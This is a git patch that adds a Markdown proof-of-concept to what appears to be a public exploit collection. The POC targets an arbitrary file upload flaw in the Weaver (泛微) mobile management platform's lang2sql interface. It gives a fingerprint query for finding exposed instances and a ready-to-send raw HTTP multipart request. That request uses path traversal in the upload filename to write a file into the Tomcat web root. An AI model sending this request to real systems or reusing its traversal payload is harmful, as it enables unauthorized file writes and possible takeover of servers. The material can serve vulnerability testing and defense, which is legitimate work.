From 8c4448520a60cd670dd638a00eb6a617033ba793 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 7 Jan 2024 19:56:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AE=E7=A7=BB=E5=8A=A8?=
 =?UTF-8?q?=E7=AE=A1=E7=90=86=E5=B9=B3=E5=8F=B0lang2sql=E6=8E=A5=E5=8F=A3?=
 =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 泛微移动管理平台lang2sql接口任意文件上传.md | 28 +++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 泛微移动管理平台lang2sql接口任意文件上传.md

diff --git a/泛微移动管理平台lang2sql接口任意文件上传.md b/泛微移动管理平台lang2sql接口任意文件上传.md
new file mode 100644
index 0000000..2331134
--- /dev/null
+++ b/泛微移动管理平台lang2sql接口任意文件上传.md
@@ -0,0 +1,28 @@
+## 泛微移动管理平台lang2sql接口任意文件上传
+
+## 
+```
+web.title="移动管理平台"
+```
+
+
+## poc
+```
+POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Accept-Language: zh-CN,zh;q=0.9
+Host: 目标地址
+Content-Length: 202
+Expect: 100-continue
+Connection: close
+
+------WebKitFormBoundarymVk33liI64J7GQaK
+Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/9SIpL.txt"
+
+b9Q2Itmn1
+------WebKitFormBoundarymVk33liI64J7GQaK--
+```
+![0302764cce0476f1d9d11374c18c024b](https://github.com/wy876/POC/assets/139549762/84018feb-2591-45a6-bf0f-663f32e7d98f)
+
+![5cd4ffd5a4d86ad03d7208e3cc646f86](https://github.com/wy876/POC/assets/139549762/62003fb2-0dea-4dde-87ad-4c4165cc55d8)